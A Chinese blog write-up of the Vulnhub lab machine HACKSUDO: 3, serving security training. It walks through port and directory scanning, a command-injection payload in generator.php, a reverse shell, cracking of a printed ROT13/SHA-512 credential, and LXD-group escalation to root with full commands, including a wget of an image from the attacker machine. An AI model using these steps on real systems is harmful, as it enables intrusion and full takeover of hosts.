Vulnhub靶机测试 NO.29 HACKSUDO: 3 命令执行+凯撒密码sha512解密, + lxd提权

已于 2022-03-17 15:30:49 修改
阅读量4.7k 收藏 3
点赞数 2
分类专栏: 靶机学习 文章标签: linux 安全 运维
于 2022-03-17 15:23:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/123531835
版权

Vulnhub靶机测试 NO.29 HACKSUDO: 3

Vulnhub靶机测试 NO.29 HACKSUDO: 3

1 靶机介绍

1.1 靶机地址

https://www.vulnhub.com/entry/hacksudo-fog,697/

1.2 环境搭建

使用VirtualBox启动,靶机ip与kali ip配置 同段

2 测试过程

2.1 nmap探测ip

nmap -sP 192.168.56.0/24
在这里插入图片描述

2.2 nmap扫描端口

nmap -sC -sV -A -p- 192.168.56.119 -o port.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-17 09:46 CST
Nmap scan report for 192.168.56.119
Host is up (0.00046s latency).
Not shown: 65532 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: Link Lock - Password-protect links
MAC Address: 08:00:27:A6:1E:CD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.56.119

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.34 seconds

探测到21 22 端口被过滤
21/tcp filtered ftp
22/tcp filtered ssh
开放端口有
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))

操作系统类型版本
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6

2.3 测试思路

只能通过80端口测试漏洞。
首页功能点测试,源码js文件审查,目录扫描,扫描页面功能点测试。

2.4 浏览首页

在这里插入图片描述
发现是一处url链接加密的工具,
发现一些密码 进行记录下来

avocado
urlpage5
torrenting_is-legal!
暂时没有发现其他可利用的点

2.5 目录扫描

gobuster dir -u 192.168.56.119/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt

在这里插入图片描述
发现三个 php页面
/info.php (Status: 200) [Size: 83324]
/login.php (Status: 200) [Size: 497]
/generator.php (Status: 200) [Size: 647]

2.5.1 访问info.php (有用)

在这里插入图片描述
phpinfo页面

2.5.2 访问login.php

在这里插入图片描述
登录页面
测试不提示 账号是否正确

2.5.3 访问generator.php(命令注入)

在这里插入图片描述
一个名称生成器

测试发现存在命令注入
payload

Youth && id

在这里插入图片描述

2.6 命令注入反弹shell

2.6.1 kali开启监听

在这里插入图片描述

2.6.2 反弹shell

在这里插入图片描述
注意bp发送post数据需要url编码 &&

2.7 切换完整shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm 然后 Ctrl+Z 退出来一下
stty raw -echo;fg 回车后输入 reset 再回车
stty rows 46 columns 188

在这里插入图片描述

切换后就可以命令按tab补全等功能

2.8 提权至hacksudo账号

2.8.1 信息收集

在网站目录下发现一个hacksudo 文件

在这里插入图片描述

unpxfhqb ybpxre FFU hfreanzr:unpxfhqb cnffjbeq:63p9142792q571q0s7p28ro30626q6s38792n2r7679o76q784231676q62447so80ns8953745s709p6622qqn2po4q754p262q0q31o3030n08s7o524079n6o336o

看起来像是加密 又有文字 可能是凯撒密码

它是一种替换加密的技术,明文中的所有字母都在字母表上向后(或向前)按照一个固定数目进行偏移后被替换成密文。例如,当偏移量是3的时候,所有的字母A将被替换成D,B变成E,以此类推。
2.8.2 凯撒密码解密

最后通过移位13位 得到明文
在这里插入图片描述
hacksudo locker SSH username:hacksudo password:63c9142792d571d0f7c28eb30626d6f38792a2e7679b76d784231676d62447fb80af8953745f709c6622dda2cb4d754c262d0d31b3030a08f7b524079a6b336b

2.8.3 sha512解密

在这里插入图片描述
vishal

2.8.4 su hacksudo -l

su hacksudo -l
vishal
在这里插入图片描述

登录hacksudo 账号成功
得到user.txt的flag
在这里插入图片描述

2.9 lxd提权至root

一般提权我们会看
用户组
内核漏洞
sudo权限
suid文件
cron定时任务
特殊文件权限
不常见的文件等等

2.9.1 用户组

在这里插入图片描述
看见了所属组有lxd
我们可以利用lxd的漏洞将 lxd组用户提权至root

2.9.2 kali攻击机操作

  1. 通过git将构建好的alpine镜像克隆至本地;

    git clone https://github.com/saghul/lxd-alpine-builder.git

  2. 执行“build -alpine”命令完成最新版本的Alpine镜像构建,此操作必须由root用户完成;

    cd lxd-alpine-builder   
sudo ./build-alpine

    在这里插入图片描述
    在这里插入图片描述

  3. 将tar文件发送至目标设备;

    下载好后 启动python http访问

    python3 -m http.server 80
2.9.3 靶机操作

靶机操作:

  1. 下载攻击机上的alpine-v3.15-x86_64-20220124_1022.tar.gz

    wget http://192.168.56.137/alpine-v3.15-x86_64-20220317_1435.tar.gz

  2. 导入镜像并初始化镜像

    lxc image import ./alpine-v3.15-x86_64-20220317_1435.tar.gz --alias test
lxc init test test -c security.privileged=true

    在这里插入图片描述
    报错了 说没有初始化

    lxd init    一路回车

    在这里插入图片描述

    lxc init test test -c security.privileged=true 初始化镜像

在这里插入图片描述

  1. 挂载磁盘

    lxc config device add test test disk source=/ path=/mnt/root recursive=true

    在这里插入图片描述

  2. 启动镜像并进入镜像访问任意文件

    lxc start test
lxc exec test /bin/sh
id
cd /mnt/root
ls
cd /root
cat proof.txt
cat root.txt

在这里插入图片描述

3 总结

该靶机通过
1.nmap端口信息收集 只扫出80端口。
2.gobuster目录扫描,扫出phpinfo,generator页面(存在命令执行&&id) getshell
3.凯撒密码移位13位和sha512解密 提权至hacksudo用户。
4.lxd提权至root。

LuckyCharm~
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
编写程序,利用Java实现凯撒(caesar)算法的加密和解密
qq_43794633的博客
06-16 4137
1.使用说明 本程序使用eclipse Java编写。使用该程序可利用eclipse打开源代码文件夹,由于使用了有道词典API(使用时需要自己申请,修改API调用源码中的两个变量),所以在运行时需要联网,然后运行Main.java即可输出结果。可对常量明文plaintext和密钥key进行修改,重新输出。 2.运行截图 3.总体设计 明文可以是一个单词或者是单词间以空格为分割的句子,加密时逐个对加密的句子(单词)的字符进行加密。解密时可以用加密的函数,只不过传入的key是负数。通过暴力破解解密时,先判断
linux kaiser补丁下载,修复Intel CPU漏洞的视窗补丁来了~
weixin_30905655的博客
05-16 327
看了下,采用的应该是类似LINUX下的KAISER技术,采用shadow页表技术,R3,R0用不同的页表,内核地址在R3中只有极少数被映射,大部分都无效,R0中的都有效,并且R3地址也都能访问,只通过SMAP和SMEP来进行保护。在打了新的WIN10补丁后,我们在KPROCESS里会看到0:kd>dtnt!_EPROCESS@$procImageFileN...
BUUCTF-Crypto-凯撒密码爆破+中文电码+md5+猪圈密码WP
weixin_47869330的博客
12-18 2405
1.中文电码-信息化时代的步伐 题目: 这个提示在题目里面,既然是中文,那么用中文电码试试:在线解密 嘻嘻 留个课堂作业: 1170117013315045113111310686000620534104117011290334 2.凯撒密码爆破-凯撒?替换!呵呵! 凯撒爆破: MTHJ{CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCOHCFDUCGTXZOHIXOEOWMEHZO} 注意:得到的 flag 请包上 flag{} 提交, flag{小写字母} 令 MTHJ=fla
X86 CPU特性之(3)-kaiser
rayylee
07-06 1478
kaiser(欧洲人名),公元前102年7月12日-公元前44年3月15日,Kaiser源于凯撒,德语里指神圣罗马帝> > 国(962-1806)、德意志帝国、奥地利帝国皇帝。 内核页表隔离(Kernel page-table isolation,缩写KPTI,也简称PTI,旧称KAISER)是Linux内核中的一种强化技术,旨在更好地隔离用户空间与内核空间的内存来提高安全性,缓解现代x86 CPU中的“熔断(Meltdown)”硬件安全缺陷。 前身 KPTI补丁基于KAISER,它是一个用.
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
LINUX kernel内核各版本下载
yufeng1108的专栏
03-30 2175
LINUX内核 各版本下载链接: https://www.kernel.org/pub/linux/kernel/
Linux 4.13/4.14内核中带来的ULP(Upper Layer Protocol)
Netfilter
10-14 1万+
序过了一个很爽的国庆假期,跟小小的小男朋友家长一起回其老家尝到了潮汕美食,南澳岛捕鱼捕虾,海鲜撑到爆,回到深圳次日小小另一个小朋友家长又带我们到东莞长安尝到了正宗的恩施土家菜,几天下来喝了几顿爽酒,吃喝玩乐再没有比这更惬意的了,这多亏了小小拓展了我们的社交圈子…  我想起了14年在上海跟邻居朋友一起从嘉定自驾到苏州,而后在一家金鸡湖边上的日料店作到杯盘狼藉而不思归,玩味了彻底淋漓江南烟雨中的感觉,想
Vulnhub项目:Breakout
Ays.Ie的博客
04-15 390
本篇记录了vulhub靶机:breakout的整个渗透过程,希望能够帮助到有需要的人
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth
Aluxian_的博客
07-08 1037
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
【甄选靶场】 Vulnhub百个项目渗透——项目四十六:bulldog-2(登陆框命令执行,写入用户)
人间体佐菲的博客
10-22 469
【甄选靶场】 Vulnhub百个项目渗透——项目四十六:bulldog-2(登陆框命令执行,写入用户)
凯撒密码 C语言 加密解密
热门推荐
肥肉的小屋
03-18 5万+
凯撒密码凯撒加密(Caesarcipher)是一种简单的消息编码方式:它根据字母表将消息中的每个字母移动常量位k。 举个例子如果k等于3,则在编码后的消息中,每个字母都会向前移动3位: a会被替换为d;b会被替换成e;依此类推。字母表末尾将回卷到字母表开头。 于是,w会被替换为z,x会被替换为a。如果是将移动的位数用随机数进行代替,并且记录下该随机数,则破解密码的难度将大大增加。Source
python实现凯撒加密和暴力破解
最新发布
m0_62487114的博客
11-09 247
编写程序,要求输入一个字符串,然后输入一个整数作为凯撒加密算法的密钥,输出该字符串加密后的结果。(提示:凯撒加密是一种替换加密的技术,明文中的所有字母都在字母表上向后(或向前)按照一个固定数目n进行偏移后被替换成密文,此处的n就是密钥。
linux 密码文件 /etc/shadow,SHA512 破解
自我---追梦的博客
07-06 8039
{用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效天数}:{保留}所有伪用户的密码都是 “!” 或 “*”,代表没有密码是不能登录的。当然,新创建的用户如果不设定密码,那么它的密码项也是 “!注意,这串密码产生的乱码不能手工修改,如果手工修改,系统将无法识别密码,导致密码失效。比较复杂的密码,进行破解花费的时间会长一些。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值